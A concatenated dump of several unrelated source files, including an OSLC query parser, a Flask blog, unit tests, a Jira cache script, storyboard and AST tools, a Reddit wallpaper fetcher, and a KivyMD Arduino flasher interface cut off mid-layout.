| logicalcompound_term ( "||" logicalcompound_term )+ -> do_logicalor
?logicalcompound_term : "(" ( compound_term | logicalor_term ) ")"
| "(" ( compound_term | logicalor_term ) ")" ("&&" logicalcompound_term)+ -> do_logicaland
""" + _core_oslc_grammar
# The basic grammer removes logicalorterm and logicalandterm
_basic_oslc3_query_grammar = """
where_expression : compound_term
""" + _core_oslc_grammar
# This class will turn a parsed query into a list of steps each (identifier,operation,value) - corresponding to an OSLC query compound_term
# and these lists are combined with the enhanced operations for logicalor and logicaland
# the idea is that results from OSLC query compound_terms are pushed on a stack, and the the logicalor and logicaland take the top
# two entries in the stack and push one result back on the stack.
# The stack will end up with one entry - the results - this is assured by the parsing because it won't generate anything else on a valid enhanced query string
# the transformer does things like turning identifiers (which are human-friendly names) into URIs using nameresolver, and
# turning valueidentifier which are friendly enumeration value names into <URI> (this is done in the term() method)
# while doing this it updates the mapping dictionaries so the results
# can use them to turn result URIs back into friendly names
# leafs of the tree are called first, returning results upwards
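# Illustrative shape of the transformed output (attribute names hypothetical):
# a term becomes [identifier_uri,op,value] and do_oslcand produces
# ['and',term1,term2,...], so (state='Open') && ((p='High') || (p='Low'))
# transforms to [[open_term],[[high_term],[low_term],'logicalor'],'logicaland']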
class _ParseTreeToOSLCQuery(lark.visitors.Transformer):
def __init__(self,resolverobject):
super().__init__()
self.resolverobject = resolverobject
self.mapping_uri_to_identifer = {}
self.mapping_identifer_to_uri = {}
self.mapping_folders = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
self.mapping_users = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
self.mapping_modules = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
self.mapping_projects = {} # contains both: key name->uri and key uri->name (uris and names never overlap)
def where_expression(self, s):
logger.debug( f"where_expression {s=}" )
result = s
logger.debug( f"where_expression {s=} returning {result=}" )
return s
def do_logicalor(self, s):
if len(s) == 1:
result = s[0]
else:
if isinstance(s[0][0], str):
res0 = [s[0]]
else:
res0 = s[0]
if isinstance(s[1][0], str):
res1 = [s[1]]
else:
res1 = s[1]
result = [res0, res1, "logicalor"]
return result
def do_logicaland(self, s):
if len(s) == 1:
result = s[0]
else:
if isinstance(s[0][0], str):
res0 = [s[0]]
else:
res0 = s[0]
if isinstance(s[1][0], str):
res1 = [s[1]]
else:
res1 = s[1]
result = [res0, res1, "logicaland"]
return result
def compound_term(self,s):
return s
def boolean_op(self,s):
return "and"
def do_oslcand(self, s):
if isinstance(s, list):
if len(s) == 1:
result = s
else:
result = s
else:
raise Exception( f"s isn't a list! {s=}" )
# put the and first, then term1 then term2
# check if term2 is another and
if s[2][0]=='and':
# if the second term of the and is another and, flatten it out
result = [s[1],s[0],s[2][1], s[2][2]]
else:
# otherwise rearrange to be 'and' term1 term2
result = [s[1],s[0],s[2]]
return result
def term(self, s):
# if the RHS (or, for "in", any of the items in the RHS list) is a valueidentifier without a prefix, this uses the LHS to resolve the valueidentifier, i.e. as context for attribute value names
# or if the RHS is an untyped literal then the LHS is used to apply ^^type:name to it to make it a typedliteral
# check if first elem is a property identifier, and if so see if value(s) are identifiers if so resolve them in context of the first identifier (e.g. for enum values)
logger.info( f"Term {type(s)} {s}" )
identifier, op, value = s
if s[0] != '*':
#
if op == "in":
# the "value" is actually a list of values, each of which must be resolved if it is an identifier
if not isinstance(value, list):
value = [value]
resultlist = []
for val in value:
if isinstance(val, str) and not val.startswith('"') and ':' not in val:
# this is an valueidentifier - try to resolve it as an enum in the context of identifier
if self.resolverobject.resolve_enum_name_to_uri is not None:
result = self.resolverobject.resolve_enum_name_to_uri(val,identifier)
if result is None:
raise Exception(f"List ref {val} not resolved in context {identifier}")
resultlist.append("<" + result + ">")
else:
resultlist.append(val)
s[2] = resultlist
else:
t1 = type(value)
logger.info( f"t1 {value} {t1=}" )
if isinstance(value, str) and not value.startswith('"') and not value.startswith("'") and ':' not in value and not re.match(r"\d",value):
# this is a valueidentifier - try to resolve it as an enum in the context of identifier
if self.resolverobject.resolve_enum_name_to_uri is not None:
result = self.resolverobject.resolve_enum_name_to_uri(value, identifier)
if result is None:
raise Exception(f"Single ref {value} not resolved in context {identifier}")
if result.startswith("http:") or result.startswith("https:"):
s[2] = "<" + result + ">"
else:
s[2] = '"'+result+'"'
logger.info( f"Term returning {s}" )
return s
def simpleidentifier(self,s):
logger.info( f"simpleidentifier {s=}" )
if len(s) != 1:
raise Exception( "Bad simpleidentifier" )
resultname = s[0].value
# look it up and if necessary store to mapping
result = self.resolverobject.resolve_property_name_to_uri(resultname)
if result is None:
raise Exception("Name resolution for %s failed!" % (resultname))
else:
self.mapping_identifer_to_uri[resultname] = result
self.mapping_uri_to_identifer[result] = resultname
logger.info( f"simpleidentifier {result=}" )
return result
def prefixedname(self,s):
logger.info( f"prefixedname {s=}" )
logger.info( f"prefixedname {s=}" )
result = s[0]+":"+s[1]
logger.info( f"prefixedname {result=}" )
return result
def dottedname(self,s):
logger.info( f"dottedname {s=} {s[0]=}" )
if len(s) != 2:
raise Exception( "Bad dottedname" )
# s[0][0] is the shape name
# s[0][1] is the proprty name
shapename = s[0].value
propname = s[1].value
shapeuri = self.resolverobject.resolve_shape_name_to_uri(shapename)
result = self.resolverobject.resolve_property_name_to_uri(propname,shapeuri )
self.mapping_identifer_to_uri[f"{shapename}.{propname}"] = result
self.mapping_uri_to_identifer[result] = f"{shapename}.{propname}"
logger.info( f"dottedname {s=} {s[0]=} returns {result}" )
return result
def identifier(self, s):
logger.info( f"Identifier {s=}" )
if len(s) == 1:
if type(s[0])==str:
result = s[0]
else:
result = s[0].value
elif len(s) > 1:
raise Exception( "Bad identifier" )
logger.info( f"Identifier returning {result=}" )
return result
def urioffoldername(self,s):
logger.info( f"urioffoldername {s=}" )
name=s[0].strip('"')
if self.resolverobject.folder_nametouri_resolver is not None:
uri = self.resolverobject.folder_nametouri_resolver(name)
if uri is None:
raise Exception( "Folder name {name} not found!" )
self.mapping_folders[name]=uri
self.mapping_folders[uri]=name
result = "<"+uri.folderuri+">"
else:
raise Exception( "This application doesn't support folder names!" )
return result
def uriofuser(self,s):
logger.info( f"uriofuser {s=}" )
name=s[0].strip('"')
if self.resolverobject.user_nametouri_resolver is not None:
uri = self.resolverobject.user_nametouri_resolver(name)
if uri is None:
raise Exception( "User name {name} not found!" )
self.mapping_users[name]=uri
self.mapping_users[uri]=name
result = "<"+uri+">"
else:
raise Exception( "This application doesn't support users names!" )
return result
def uriofmodule(self,s):
logger.info( f"uriofmodule {s=}" )
name=s[0].strip('"')
if self.resolverobject.resolve_modulename_to_uri is not None:
uri = self.resolverobject.resolve_modulename_to_uri(name)
if uri is None:
raise Exception( f"Module name {name} not found!" )
logger.info( f"uriofmodule {uri=}" )
self.mapping_modules[name]=uri
self.mapping_modules[uri]=name
result = "<"+uri+">"
else:
raise Exception( "This application doesn't support module names!" )
return result
# def uriofproject(self,s):
# logger.info( f"uriofproject {s=}" )
# name=s[0].strip('"')
# if self.resolverobject.resolve_project_nametouri is not None:
# uri = self.resolverobject.resolve_project_nametouri(name)
# if uri is None:
# raise Exception( f"Project name {name} not found!" )
# logger.info( f"{uri=}" )
# self.mapping_projects[name]=uri
# self.mapping_projects[uri]=name
# result = "<"+uri+">"
# else:
# raise Exception( "This application doesn't support project names!" )
# return result
def valueidentifier(self, s):
logger.info( f"valueidentifier {s=}" )
if len(s)>2:
raise Exception( f"s should be no more than two items {s=}" )
elif len(s)==2:
# this is a prefix:name - check prefix is in the known prefixes and add it to the list of use prefixes
resultname = s[0].value+":"+s[1].value
# for DOORS Next always expand the prefixed name to be an actual URI
result = "<"+rdfxml.tag_to_uri(resultname)+">"
else:
result = s[0].value
logger.info( f"valueidentifier {s=} returning {result}" )
return result
def unsignedinteger(self, s):
logger.info( f"unsignedinteger {s=}" )
result = s[0]
logger.info( f"unsignedinteger {s=} returning {result}" )
return result
def reqid_to_core_uri(self, s):
logger.info( f"reqid_to_core_uri {s=}" )
if len(s)>2:
raise Exception( f"s should be no more than two items {s=}" )
elif len(s)==2:
# this is a prefix:name - check prefix is in the known prefixes and add it to the list of use prefixes
resultname = s[0].value+":"+s[1].value
# for DOORS Next always expand the prefixed name to be an actual URI
result = "<"+rdfxml.tag_to_uri(resultname)+">"
else:
result = s[0].value
# now look it up - using an OSLC query!
requri = self.resolverobject.resolve_reqid_to_core_uri( result )
if requri is None:
raise Exception( f"ID {result} not found!" )
result = "<"+requri+">"
logger.info( f"reqid_to_core_uri {s=} returning {result}" )
return result
def reqid_to_module_uris(self, s):
logger.info( f"reqid_to_module_uris {s=}" )
if len(s)>2:
raise Exception( f"s should be no more than two items {s=}" )
elif len(s)==2:
# this is a prefix:name - check prefix is in the known prefixes and add it to the list of use prefixes
resultname = s[0].value+":"+s[1].value
# for DOORS Next always expand the prefixed name to be an actual URI
result = "<"+rdfxml.tag_to_uri(resultname)+">"
else:
result = s[0].value
# now look it up - using an OSLC query!
requris = self.resolverobject.resolve_reqid_to_module_uris( result )
if requris is None:
raise Exception( f"ID {result} not found!" )
result = "<"+">,<".join(requris)+">"
logger.info( f"reqid_to_module_uris {s=} returning {result}" )
return result
def comparison_op(self, s):
logger.info( f"comparison_op {s=}" )
return s[0].value
def value(self, s):
logger.info( f"value {s=}" )
result = s[0]
logger.info( f"value {s=} returning {result}" )
return result
def invalue(self, s):
logger.info( f"invalue {s=}" )
result = s[0]
logger.info( f"invalue {s=} returning {result}" )
return result
def string_esc(self, s):
logger.info( f"string_esc {s} returning {s[0].value}" )
return s[0].value # string literals include double quotes in the value
def typedliteralstring(self, s):
logger.info( f"typedliteralstring {s}" )
if s[1]=="xsd:datetime":
if not re.match(r'"\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\d((\.|,)\d\d\d)?(Z|[+-]\d\d:\d\d)?)?"',s[0]):
raise Exception( f'Datetime {s[0]} not valid - must be "yyyy-mm-dd[Thh:mm:ss[./,fff]?[Z|+/-hh:mm]]"' )
result = s[0]+"^^"+s[1]
logger.info( f"typedliteralstring {s} returning {result}" )
return result # string literals include double quotes in the value
def literalstring(self, s):
# check for a datetime literal and annotate it with the xsd
if re.match(r'"\d\d\d\d-\d\d-\d\d(T\d\d:\d\d:\d\d((\.|,)\d\d\d)?(Z|[+-]\d\d:\d\d)?)?"',s[0]):
result = s[0]
# this works for DN but not EWM result = s[0]+"^^xsd:datetime"
else:
result = s[0]
logger.info( f"literalstring {s} {s[0]} returning {result}" )
return result # string literals include double quotes in the value
def boolean(self, s):
if s[0].value=="true":
return True
elif s[0].value=="false":
return False
else:
raise Exception( f"Boolean value must be either true or false - f{s[0].value} isn't allowed" )
def decimal(self, s):
logger.info( f"decimal {s=}" )
# try to convert to int first
try:
result = int(s[0].value)
except ValueError:
# otherwise try to convert to float
result = float(s[0].value)
return result
def in_val(self, s):
if len(s) == 1:
result = s[0]
else:
result = s
return result
def inop(self, s):
logger.info( f"inop {s=}" )
return "in"
def scoped_term(self, s):
logger.info( f"scoped_term {s=}" )
return [s[0], "scope", s[1:]]
# from https://tools.oasis-open.org/version-control/svn/oslc-core/trunk/specs/oslc-core.html#selectiveProperties
# with slight tweaks to implement identifier
_select_grammar ="""
select_terms : properties
properties : property ("," property)*
property : dottedname | identifier | wildcard | nested_prop
dottedname : NAME "." NAME
nested_prop : (identifier | wildcard) "{" properties "}"
wildcard : "*"
identifier : ( ( URI_REF_ESC | NAME ) ":" )? NAME
URI_REF_ESC : /<https?:.*>/
NAME : /[a-zA-Z0-9_]\w*/
"""
_orderby_grammar = """
sort_terms : sort_term ("," sort_term)*
sort_term : scoped_sort_terms | signedterm
signedterm : SIGN identifier
scoped_sort_terms : identifier "{" sort_terms "}"
identifier : ( ( URI_REF_ESC | NAME ) ":" )? NAME
URI_REF_ESC : /<https?:.*>/
NAME : /[a-zA-Z0-9_]\w*/
SIGN : ( "+" | "-" | ">" | "<" )
"""
# This class will turn a textual orderby specification into a list of orderby terms
# the transformer does things like turning identifiers (which are human-friendly names) into URIs using nameresolver, and
# turning valueidentifier which are friendly enumeration value names into <URI> (this is done in the term() method)
# leafs of the tree are called first, returning results upwards
class _ParseTreeToOSLCOrderBySelect(lark.visitors.Transformer):
# def __init__(self, shaperesolver=None, nameresolver=None):
def __init__(self, resolverobject):
super().__init__()
self.mapping_uri_to_identifer = {}
self.mapping_identifer_to_uri = {}
self.resolverobject = resolverobject
self.prefixes = {} # prefixes used (will have to be added to oslc.prefix) - NOTE the key is the uri, the value is the prefix!
def select_terms(self,s):
return s[0]
def select_term(self,s):
return s
def nested_prop( self,s):
result = s[0]+"{"+",".join(s[1])+"}"
return result
def wildcard(self,s):
return "*"
def properties(self,s):
return s
def property(self,s):
return s[0]
def sort_terms(self,s):
return s
def sort_term(self,s):
return s[0]
def signedterm(self,s):
# mapping to always + or -
signs = { ">": "+", "<": '-', "+": "+", "-": "-"}
return signs[s[0]]+s[1]
def scoped_sort_terms(self,s):
return s
def identifier(self, s):
if len(s) == 1:
resultname = s[0].value
elif len(s) > 1:
# a prefixed name
resultname = ":".join([s[0].value, s[1].value])
if s[0].value in rdfxml.RDF_DEFAULT_PREFIX:
self.prefixes[rdfxml.RDF_DEFAULT_PREFIX[s[0].value]]=s[0].value
else:
raise Exception( f"Prefix in orderby '{s[0].value}' not found!" )
# look it up and if necessary store to mapping
if ":" not in resultname:
if self.resolverobject.resolve_property_name_to_uri is not None:
result1 = self.resolverobject.resolve_property_name_to_uri(resultname)
if result1 is None:
raise Exception("Name resolution for %s failed!" % (resultname))
else:
self.mapping_identifer_to_uri[resultname] = result1
self.mapping_uri_to_identifer[result1] = resultname
result = rdfxml.uri_to_prefixed_tag(result1, uri_to_prefix_map=self.prefixes)
else:
raise Exception( f"Cannot resolve {resultname} - no name resolver provided! " )
else:
# a prefixed name is assumed to be usable directly (the prefix has been added to prefixes)
result = resultname
return result
``` |
{
"source": "Jjrex8988/BlogCapstoneProject",
"score": 3
} |
#### File: Jjrex8988/BlogCapstoneProject/main.py
```python
from flask import Flask, render_template
import requests
# posts = requests.get("https://api.npoint.io/43644ec4f0013682fc0d").json()
posts = requests.get('https://api.npoint.io/5083070470e7db605e88').json()
app = Flask(__name__)
@app.route('/')
def get_all_posts():
return render_template("index.html", all_posts=posts)
@app.route("/post/<int:index>")
def show_post(index):
requested_post = None
for blog_post in posts:
if blog_post["id"] == index:
requested_post = blog_post
return render_template("post.html", post=requested_post)
@app.route("/about")
def about():
return render_template("about.html")
@app.route("/contact")
def contact():
return render_template("contact.html")
if __name__ == "__main__":
app.run(debug=True)
``` |
{
"source": "jjrodcast/CompetitiveProblems",
"score": 4
} |
#### File: CompetitiveProblems/leetcode/same_tree.py
```python
class TreeNode:
def __init__(self, val=0, left=None, right=None):
self.val = val
self.left = left
self.right = right
class Solution:
def isSameTree(self, p: TreeNode, q: TreeNode) -> bool:
if not p and not q:
return True
elif (p and not q) or (not p and q):
return False
else:
return self.isSameTree(p.left, q.left) and self.isSameTree(p.right, q.right) and p.val == q.val
if __name__ == "__main__":
p = TreeNode(val=1, left=TreeNode(2), right=TreeNode(3))
q = TreeNode(val=1, left=TreeNode(2), right=TreeNode(3))
solution = Solution()
print(solution.isSameTree(p, q))
``` |
{
"source": "jjrojas95/Distintas_tecnicas_GANs",
"score": 3
} |
#### File: Distintas_tecnicas_GANs/tests/maxout_test.py
```python
import unittest
from unittest import TestCase
import numpy as np
import tensorflow as tf
from tensorflow.keras.layers import Layer
from notebooks.helper_func.custom_layers import Maxout
class TestMaxoutLayer(TestCase):
def setUp(self):
self.k = 5
self.units = 240
self.input_shape = (784,)
self.maxout_instance = Maxout(self.units, self.k)
self.maxout_instance.build(self.input_shape)
# @unittest.skip("testing the result")
def test_maxout_type(self):
self.assertTrue(isinstance(self.maxout_instance, Layer))
# @unittest.skip("testing the result")
def test_kernel_shape(self):
shape = self.maxout_instance.kernel.shape
self.assertEqual(shape, (self.input_shape[0], self.units, self.k))
# @unittest.skip("testing the result")
def test_bias_shape(self):
shape = self.maxout_instance.bias.shape
self.assertEqual(shape, (self.units, self.k))
# @unittest.skip("testing the result")
def test_output_shape(self):
input_shape = (5,)
units = 10
k = 3
other_maxout = Maxout(units, k, input_shape=input_shape)
x = tf.ones((10,5))
output = other_maxout(x)
self.assertEqual(output.shape, (10, units))
# @unittest.skip("testing the result")
def test_output_2samples_1unit(self):
# First part: a single unit, two samples, and reduction over k.
m = 2
input_shape = (2,)
units = 1
k = 3
w = tf.reshape(tf.cast(tf.range(1,7), tf.float32), (input_shape[-1], units, k))
other_maxout = Maxout(units, k)
other_maxout.build((m, *input_shape))
other_maxout.kernel.assign(w)
x = tf.reshape(tf.cast(tf.range(1,5), tf.float32), (m, *input_shape))
expect_val = tf.reshape(tf.convert_to_tensor([15., 33.]), (m, units))
self.assertEqual(other_maxout(x).numpy().tolist(), expect_val.numpy().tolist())
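# Hand check of the expected values above: with the kernel set as above and
# the bias at its (assumed zero) initialization, z_k = x . w[:,0,k], so sample
# [1,2] gives max(1*1+2*4, 1*2+2*5, 1*3+2*6) = max(9,12,15) = 15 and sample
# [3,4] gives max(19,26,33) = 33, matching expect_val.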
def test_output_1samples_2unit(self):
m = 1
input_shape = (2,)
units = 2
k = 3
w = tf.reshape(tf.cast(tf.range(1,13), tf.float32), (input_shape[-1], units, k))
other_maxout = Maxout(units, k)
other_maxout.build((m, *input_shape))
other_maxout.kernel.assign(w)
x = tf.reshape(tf.cast(tf.range(1,3), tf.float32), (m, *input_shape))
expect_val = tf.reshape(tf.convert_to_tensor([21., 30.]), (m, units))
self.assertEqual(other_maxout(x).numpy().tolist(), expect_val.numpy().tolist())
if __name__ == '__main__':
unittest.main()
``` |
{
"source": "jjrscott/banteng",
"score": 3
} |
#### File: banteng/banteng/banteng.py
```python
import argparse
import json
def main():
parser = argparse.ArgumentParser(description='Generate a simple abstract syntax tree from the given files',
epilog="""""",
formatter_class=argparse.RawDescriptionHelpFormatter)
parser.add_argument('input', nargs='*', help='Files to be parsed')
parser.add_argument('--output', default='-', help='Location to save the AST')
parser.add_argument('--grammar', help='A JSON file containing the grammar', required=True)
args = parser.parse_args()
with open(args.grammar, 'r') as f:
grammar = json.load(f)
with open(args.grammar, "w") as file:
file.write(json.dumps(grammar, sort_keys=True, indent=2))
file.write("\n")
ast = {}
for input_path in args.input:
with open(input_path, 'r') as file:
text = file.read()
ast[input_path] = generate_ast(text, grammar)
if len(ast) == 1:
ast = list(ast.values())[0]
outputContent = json.dumps(ast, sort_keys=True, indent=2)
if args.output != '-':
with open(args.output, "w") as file:
file.write(outputContent)
file.write("\n")
else:
print(outputContent)
def generate_ast(text, grammar):
# rule = rules[rule_name]
#
# if isinstance(rule, list):
foo = dict()
foo['ast'], foo['unmatched'] = parse_rule(text, grammar, grammar['syntax'])
return foo
def parse_rule(text, grammar, rule):
subresult, subtext = _parse_rule(text, grammar, rule)
if subresult and isinstance(rule, str) and rule != subresult:
subresult = {"type" : rule, "result" : subresult}
return subresult, subtext
def decode_code_point(value):
if isinstance(value, str):
return ord(value)
else:
raise Exception(f'Unknown type: {type(value)}')
def _parse_rule(text, grammar, rule):
if isinstance(rule, str):
if rule in grammar['rules']:
return parse_rule(text, grammar, grammar['rules'][rule])
elif text.startswith(rule):
return rule, text[len(rule):]
else:
return None, text
elif isinstance(rule, dict):
if 'type' in rule and rule['type'] == 'any':
for subrule in rule['values']:
subresult, subtext = parse_rule(text, grammar, subrule)
if subresult:
return subresult, subtext
return None, text
elif 'type' in rule and rule['type'] == 'range':
if len(text) and decode_code_point(rule['begin']) <= ord(text[0]) and decode_code_point(rule['end']) >= ord(text[0]):
return text[0], text[1:]
return None, text
elif 'type' in rule and rule['type'] == 'all':
results = list()
for subrule in rule['values']:
subresult, text = parse_rule(text, grammar, subrule)
if subresult:
results.append(subresult)
else:
return None, text
return results, text
elif 'min' in rule or 'max' in rule:
results = list()
while True:
subresult, text = parse_rule(text, grammar, rule['values'])
if subresult:
results.append(subresult)
if 'max' in rule and len(results) == rule['max']:
return results, text
elif 'min' in rule and len(results) < rule['min']:
return None, text
else:
return results, text
raise Exception(f'Unknown rule: {rule}')
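# Illustrative grammar file (hypothetical, matching the rule forms handled in
# _parse_rule above): "syntax" names the start rule; "rules" maps names to a
# literal string, {"type":"any"/"all","values":[...]}, {"type":"range",
# "begin":...,"end":...}, or a repetition {"min"/"max":...,"values":rule}:
#   {"syntax": "digits",
#    "rules": {"digits": {"min": 1, "values": "digit"},
#              "digit": {"type": "range", "begin": "0", "end": "9"}}}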
if __name__ == "__main__":
main()
``` |
{
"source": "jjrscott/jira-cache",
"score": 3
} |
#### File: jira-cache/src/common.py
```python
import requests
import json
import sys
class Jira:
def __init__(self, jira_url, jira_user, jira_password):
self.jira_url = jira_url
self.jira_user = jira_user
self.jira_password = jira_password
def search(self, query, startAt=None, fields=None):
params = dict()
params['jql'] = query
if fields: params['fields'] = fields
if startAt: params['startAt'] = startAt
result = requests.get(self.jira_url+'/rest/api/3/search',
auth=(self.jira_user, self.jira_password),
headers={'Content-type': 'application/json'},
params=params)
return result.json()
def searchAll(self, query, fields=None):
issues = list()
while True:
# print("search", file=sys.stderr)
result = self.search(query, startAt=len(issues), fields=fields)
if 'issues' in result and len(result['issues']) > 0:
issues += result['issues']
if 'total' in result and len(issues) >= result['total']:
break
else:
break
return issues
def sql_get_rows(conn, query, *values):
return conn.execute(query, values)
def sql_set_row(conn, table, **row):
keys = sorted(row)
sql = f"""REPLACE INTO {table} ({','.join(map(lambda key: f"`{key}`", keys))}) VALUES ({','.join('?'*len(keys))})"""
try:
conn.execute(sql, list(map(lambda key: row[key], keys)))
except Exception as e:
print('sql', sql)
print('keys', keys)
print('row', row)
raise
def value_in_dict(object, *keys):
for key in keys:
if key in object and object[key]:
object = object[key]
else:
return None
return object
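# Usage sketch (illustrative; the server URL, credentials, and JQL below are
# hypothetical):
#   jira = Jira('https://example.atlassian.net', 'user@example.com', 'api-token')
#   for issue in jira.searchAll('project = DEMO', fields='summary'):
#       print(issue['key'], value_in_dict(issue, 'fields', 'summary'))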
``` |
{
"source": "jjrscott/StoryboardGraph",
"score": 3
} |
#### File: jjrscott/StoryboardGraph/storyboard-graph.py
```python
import argparse
from xml.etree import ElementTree
import os
import re # needed by compile_pattern below
def main():
parser = argparse.ArgumentParser(description='Visualise a collection of storyboards as a unified directed graph')
parser.add_argument('storyboard', nargs='+', help='Path to Storyboards')
args = parser.parse_args()
print(f"graph TD")
builder = TreeBuilder()
for storyboard_path in args.storyboard:
storyboard_name = os.path.splitext(os.path.basename(storyboard_path))[0]
builder.currentStoryboardName = storyboard_name
ElementTree.parse(storyboard_path, ElementTree.XMLParser(target=builder))
builder.finalize()
class TreeBuilder(ElementTree.TreeBuilder):
def __init__(self):
self.lastComment = None
self.currentStoryboardName = None
self.mainSceneObjectId = None
self.links = set()
self.stack = list()
self.previousTag = None
def finalize(self):
print()
for link in self.links:
print(link)
def comment(self, data):
# print(data)
self.lastComment = data
def start(self, tag, attrs):
if tag == 'document':
print(f" subgraph {self.currentStoryboardName}")
if 'initialViewController' in attrs:
print(f" {self.currentStoryboardName}_([ ])")
self.links.add(f"{self.currentStoryboardName}_ --> {attrs['initialViewController']}")
if 'storyboardIdentifier' in attrs:
print(f" {self.currentStoryboardName}_{attrs['storyboardIdentifier']}([{attrs['storyboardIdentifier']}])")
self.links.add(f"{self.currentStoryboardName}_{attrs['storyboardIdentifier']} -.-> {attrs['id']}")
if self.previousTag == 'objects' and 'id' in attrs:
self.mainSceneObjectId = attrs['id']
print(f" {self.mainSceneObjectId}[{self.lastComment}]")
if tag == 'viewControllerPlaceholder':
self.links.add(f"{self.mainSceneObjectId} -.-> {attrs['storyboardName']}_{attrs.get('referencedIdentifier','')}")
if tag == 'segue':
if self.mainSceneObjectId is None and 'scene' in self.stack:
raise ValueError(f"Missing mainSceneObjectId in {self.currentStoryboardName} {attrs}")
if 'destination' in attrs:
self.links.add(f"{self.mainSceneObjectId} -->|{attrs.get('identifier',' ')}| {attrs['destination']}")
# else:
# exit(f"{attrs}")
if 'exit' == tag:
if self.mainSceneObjectId is None and 'scene' in self.stack:
raise ValueError(f"Missing mainSceneObjectId in {self.currentStoryboardName} {attrs}")
print(f" {attrs['id']}[[{attrs['userLabel']}]]")
self.links.add(f"{self.mainSceneObjectId} --> {attrs['id']}")
self.stack.append(tag)
self.previousTag = tag
def end(self, tag):
self.stack.pop()
if tag == 'document':
self.currentStoryboardName = None
print(f" end")
elif tag == 'scene':
self.mainSceneObjectId = None
def parse_node(node, *stack):
print(" " * len(stack), node.tag)
for subnode in node:
parse_node(subnode, node.tag, *stack)
def compile_pattern(pattern):
pattern = re.sub(r'{(\d+)}', '{{\\1}}', pattern)
try:
return re.compile(pattern, flags=re.MULTILINE|re.DOTALL)
except Exception as e:
print(pattern)
raise
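# Example invocation (the storyboard paths are illustrative); the script prints
# Mermaid graph syntax, which can be rendered with the mermaid CLI or at
# https://mermaid.live:
#   python storyboard-graph.py Main.storyboard Settings.storyboard > flow.mmd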
if __name__ == "__main__":
main()
``` |
{
"source": "jjs027/datastructures",
"score": 3
} |
#### File: ds2/figs/drawing.py
```python
from ds2viz.canvas import svg_plus_pdf
from ds2viz.datastructures import VizList, VizBST, VizTree
from ds2.tree import Tree
import os.path
def figpath(name):
return os.path.join('../figures', name)
def drawbst(T, name):
vizT = VizBST(T._root, (5,5))
with svg_plus_pdf(600, vizT.height + 10, figpath(name)) as canvas:
vizT.draw(canvas)
def drawlist(L, name):
vizL = VizList(L)
vizL.position = (5,5)
with svg_plus_pdf(600, 60, figpath(name)) as canvas:
vizL.draw(canvas)
def drawtree(T, name):
if isinstance(T, list):
T = Tree(T)
vizT = VizTree(T)
vizT.position = (5,5)
with svg_plus_pdf(600, vizT.height + 10, figpath(name)) as canvas:
vizT.draw(canvas)
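# Usage sketch (the nested-list tree shape is an assumption about ds2's Tree
# constructor, based on the isinstance(T, list) branch above):
#   drawtree([1, [2], [3, [4]]], 'tree_example')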
``` |
{
"source": "jjsanmartino03/Wallpaper-changer",
"score": 3
} |
#### File: jjsanmartino03/Wallpaper-changer/reddit.py
```python
import os
import praw # Python Reddit API Wrapper (PRAW). More information at "https://praw.readthedocs.io/en/latest/index.html"
from prawcore.exceptions import RequestException
from dotenv import load_dotenv
"""
To access the Reddit API you must have a client_id, a client_secret, and a
user_agent (the user_agent can be any string of text). You can obtain the id
and secret by creating your own app at 'https://old.reddit.com/prefs/apps/'.
If you don't have a redirect uri (required to create the app), you can fill
that field with 'http://www.example.com/unused/redirect/uri' instead.
For this program to work, you must add the id and secret to the .env file in
this directory in the format:
CLIENT_SECRET="xxxxx"
CLIENT_ID="yyyyy"
"""
def get_image_url():
    load_dotenv()  # Load the variables from the .env file into the environment
r = praw.Reddit(
client_id=os.getenv("CLIENT_ID"), # Get the environmental variables
client_secret=os.getenv("CLIENT_SECRET"),
user_agent="Wallpaper getter by u/Chu-lian13", #This is an example of user_agent, you can put whatever you want
)
try: # This is to prevent a network error
image_url = r.subreddit("wallpaper").random().url # get a random image url from reddit
        while not image_url.endswith(".jpg"):  # try until a proper image format is found
            image_url = r.subreddit("wallpaper").random().url
return image_url
    except Exception:  # e.g. a RequestException on network failure
return False
if __name__ == "__main__":
print(get_image_url())
``` |
{
"source": "jjsch-dev/PyArduinoFlash",
"score": 3
} |
#### File: PyArduinoFlash/kivymd/main.py
```python
from kivy.lang import Builder
from kivy.clock import Clock
from kivymd.app import MDApp
import threading
from queue import Queue
from intelhex import IntelHex
from intelhex import AddressOverlapError
from arduinobootloader import ArduinoBootloader
KV = '''
Screen:
MDBoxLayout:
orientation:"vertical"
padding:10
spacing:10
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"Bootloader version"
MDLabel:
id:sw_version
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"Bootloader hardware version"
MDLabel:
id:hw_version
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"Bootloader name"
MDLabel:
id:prg_name
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"CPU Name"
MDLabel:
id:cpu_version
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
MDLabel:
text:"File information"
MDLabel:
id:file_info
text:"--"
MDBoxLayout:
orientation:"horizontal"
padding:10
spacing:10
            MDTextField:
id:file_name
hint_text: "Intel HEX file format"
helper_text: "Please enter the file and path of the Arduino firmware"
helper_text_mode: "on_focus"
text:"test.hex"
MDBoxLayout:
orientation: "horizontal"
ScrollView:
MDList:
ThreeLineAvatarListItem:
on_release: app.on_sel_programmer(115200, "Stk500v1")
text: "Protocol arduino or STK500V1"
secondary_text: "for boards up to 128 Kbytes"
                        tertiary_text: "example Nano or Uno - baudrate 115200"
ImageLeftWidget:
source: "images/arduino-nano.png"
ThreeLineAvatarListItem:
on_release: app.on_sel_programmer(57600, "Stk500v1")
text: "Protocol arduino or STK500V1 - older"
secondary_text: "for boards up to 128 Kbytes"
                        tertiary_text: "example Nano or Uno - baudrate 57600"
ImageLeftWidget:
source: "images/arduino-uno.png"
ThreeLineAvatarListItem:
on_release: app.on_sel_programmer(115200, "Stk500v2")
text: "Protocol wiring or STK500V2"
secondary_text: "for boards with more than 128 Kbytes"
                        tertiary_text: "example Mega - baudrate 115200"
ImageLeftWidget:
source: "images/arduino-mega-2560-original.png"
MDBoxLayout:
padding: "10dp"
orientation: "horizontal"
MDProgressBar:
id: progress
value: 0
min: 0
max: 1
MDBoxLayout:
padding: "10dp"
orientation: "horizontal"
MDLabel:
id: status
text:"--"
MDRectangleFlatButton:
text:"Flash"
